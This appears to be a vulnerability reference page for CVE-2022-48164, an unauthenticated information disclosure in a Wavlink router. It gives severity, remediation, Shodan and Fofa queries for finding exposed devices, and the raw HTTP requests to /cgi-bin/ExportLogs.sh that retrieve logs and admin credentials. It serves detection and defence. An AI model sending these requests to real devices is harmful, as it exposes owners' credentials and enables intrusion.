🔙 목록으로 돌아가기

CVE-2022-48164: Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure

TitleWavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation could lead to sensitive information disclosure.
RemediationApply the latest firmware updates from Wavlink or implement network segmentation to restrict access to the device administration interface.
CVSS Score7.5
EPSS Score0.83123
CVE IDCVE-2022-48164
Shodan Queryhtml:"WN533A8"
Fofa Querybody="WN533A8"
Tags cve cve2022 wavlink exposure wn533a8 vkev vuln

🔍 Vulnerability Description

An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /cgi-bin/ExportLogs.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-48164.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-48164.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A